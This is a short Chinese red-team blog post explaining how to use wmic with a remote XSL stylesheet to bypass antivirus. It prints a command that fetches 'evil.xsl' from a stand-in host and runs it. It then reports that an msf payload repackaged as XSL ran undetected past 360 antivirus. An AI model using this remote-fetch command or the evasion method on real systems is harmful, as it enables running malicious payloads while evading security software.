前言

前段时间，@subTee放了一个好玩的red team tips，利用wmic来进行bypass。

正文

命令如下

wmic os get /FORMAT:”https://example.com/evil.xsl”

还给了一个demo

我们先利用这个demo试试

发现没问题。

然后我发现有些同学就开始自以为是，以为修改其中的命令就能做到bypass。。。

比如有直接把命令改成木马的

我就想说了，@subTee辛辛苦苦发现这么一个bypass技巧，仅仅是让你把calc改成其他命令的？

那正确操作是什么呢，我们来深入下。

我们看下他的xsl文件格式，发现跟xml格式一样，而且跟之前msxsl的bypass很像。

那我们的目的肯定不是仅仅去执行我们正常就能执行的命令，而是比如能够执行msf payload、mimikatz这种平常被杀软拦截的payload。

首先我们先利用msf生成一个payload

先尝试利用rundll32调用dll试试

拦截，并且把msf.dll杀掉了。

我们来把dll改成我们之前的xsl格式文件

执行看看

看到成功执行，并且绕过了360。

后续

我觉得，这才是@subTee 想让我们看到的，而不是看个表面。